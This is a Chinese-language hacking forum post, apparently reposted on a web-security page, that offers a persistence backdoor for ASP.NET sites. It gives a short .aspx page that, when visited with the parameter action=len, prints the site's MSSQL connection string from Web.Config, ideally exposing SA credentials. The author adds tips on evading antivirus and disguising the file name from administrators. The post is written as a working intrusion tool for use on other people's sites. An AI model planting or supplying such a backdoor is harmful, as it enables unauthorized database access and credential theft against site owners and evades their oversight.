某个晚上在想着在ASP.NET的站下留那种后门比较YD,想来想去还是没结果,开始想的一句话,但是那东西有求用,人家不让你写入文件
啥都白费了,留个小马还是大马?那管理不白吃饭了,最后想到了一个很YD的door,至于你用不用,反正我是要准备用了(貌似还是废话)
适应情景:
1.支持ASP.NET的环境(不支持别问我为什么运行没结果)
2.该站适用的MSSQL数据库(反正我自己搞点整点啥系统90%是ASP.NET+MSSQL,至于那ACCESS那搞搞新闻发布系统还可以)
3.Web.Config里面存有连接字符串(神马Web.Config?问百度去,哥我解释不清楚,是个系统通常连接字符串都写在这里,方便复用)
4.最好是SA权限(要不然这后门就不给力了)
如果用过ASP.NET开发过系统的同学请绕道了,下面的东西相信你应该知道我要说的了(别乱丢砖头,拿回去存着N年后可以盖房呢)。
下面就是那YD的后门代码:
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<% if(Request.Params["action"]=="len") %> '防止谁都可以浏览到加个验证
<%=ConfigurationManager.ConnectionStrings["constr"] %>'constr自己对应Web.Config里的name值修改
下面是Web.Config里的连接字符串示例
<connectionStrings>
<add name="constr" connectionString="Data Source=127.0.0.1;Initial Catalog=WebDB;User ID=sa;Password=!@#$12348888;" providerName="System.Data.SqlClient" />
</connectionStrings>
在Web.Config里找到类似这个connectionStrings节点,下一级的add就是连接字符串了,constr值对应后门里的constr
后门具体使用(这里后门在根目录命名为demo.aspx,使用的时候在站点任意目录任意名字都可以)
http://127.0.0.1/demo.asp?action=len
在 浏览器 里浏览这个上面的后门,效果就出来了,你想要的那该死的SQL连接字符串现身了,而且是SA权限,接下能干嘛你懂的,别问我了
action=len注意len区分大小写,好了剩下的童鞋们自己发挥了,我只是无意中想到这个,不晓得你们用不用得到,虽然有局限性,但是效果
自己测试了才知道,后门的好处也说说,第一免杀自然不用去想了(360想Kill我?大哥那是正常代码啊),第二权限不会掉,因为我说了前
面几个前提才使用,有了SA权限管你妹的不让我写入文件还是没有权限。
另外把文件名伪装一下,你别传个1. asp ,那管理拍死你别找我,好了,我得睡觉了,困死鸟...希望有用童鞋用去,没用的当我打字辛苦看看
查看更多关于在ASP.NET站里留个YD“后门” - 网站安全 - 自学p的详细内容...